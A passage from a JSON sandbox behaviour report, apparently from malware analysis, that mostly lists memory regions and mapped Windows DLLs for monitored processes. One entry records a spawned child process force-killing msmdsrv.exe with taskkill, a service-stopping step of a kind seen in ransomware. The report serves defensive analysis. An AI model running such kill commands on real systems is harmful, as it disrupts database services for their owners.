"00:01:27.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8650752, "type": "region", "version": 1 }, "end_va": 8912895, "entry_point": 0, "filename": null, "id": "region_3327", "name": "private_0x0000000000840000", "norm_filename": null, "region_type": "private_memory", "start_va": 8650752, "timestamp": "00:01:27.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10158080, "type": "region", "version": 1 }, "end_va": 10420223, "entry_point": 0, "filename": null, "id": "region_3328", "name": "private_0x00000000009b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10158080, "timestamp": "00:01:27.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11272192, "type": "region", "version": 1 }, "end_va": 11534335, "entry_point": 0, "filename": null, "id": "region_3329", "name": "private_0x0000000000ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11272192, "timestamp": "00:01:27.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11993088, "type": "region", "version": 1 }, "end_va": 12255231, "entry_point": 0, "filename": null, "id": "region_3330", "name": "private_0x0000000000b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 11993088, "timestamp": "00:01:27.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1785851903, "entry_point": 1785799072, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3331", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:27.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3332", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:27.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3333", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:27.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1783169024, "type": "region", "version": 1 }, "end_va": 1783267327, "entry_point": 1783173941, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3334", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1783169024, "timestamp": "00:01:27.212", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783300096, "type": "region", "version": 1 }, "end_va": 1783914495, "entry_point": 1783429305, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3335", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783300096, "timestamp": "00:01:27.212", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM msmdsrv.exe /IM msmdsrv.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_26", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 26, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3336", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:27.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3337", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:27.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3338", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:27.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3339", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:27.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3340", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:27.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_3341", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:01:27.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_3342", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:27.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3170303, "entry_point": 3103881, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3343", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 3080192, "timestamp": "00:01:27.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3344", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:27.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3345", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:27.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3346", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:27.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3347", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:27.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3348", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:27.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3349", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:27.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3350", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:27.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3351", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:27.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3352", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:27.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_3353", "name": "private_0x00000000004e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5111808, "timestamp": "00:01:27.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3354", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:27.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3355", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:27.442", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3356", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:27.442", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3357", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:27.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3358", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:27.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3359", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:27.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3360", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:27.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3361", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:27.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_3362", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:27.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 8585215, "entry_point": 0, "filename": null, "id": "region_3363", "name": "private_0x0000000000730000", "norm_filename": null, "region_type": "private_memory", "start_va": 7536640, "timestamp": "00:01:27.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783562240, "type": "region", "version": 1 }, "end_va": 1784524799, "entry_point": 1783567310, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3364", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783562240, "timestamp": "00:01:27.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787645951, "entry_point": 1787433941, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3365", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:27.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787695777, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3366", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:27.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787793407, "entry_point": 1787762086, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3367", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:27.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787822080, "type": "region", "version": 1 }, "end_va": 1787891711, "entry_point": 1787826944, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3368", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787822080, "timestamp": "00:01:27.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3369", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:27.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3370", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:27.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3371", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:27.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3372", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:27.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3373", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:27.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3374", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:27.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3375", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:27.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3376", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:27.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3377", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:27.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3378", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:27.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3379", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:27.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3380", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:27.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3381", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:27.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3382", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:27.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3383", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:27.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3384", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:27.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3385", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:27.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": 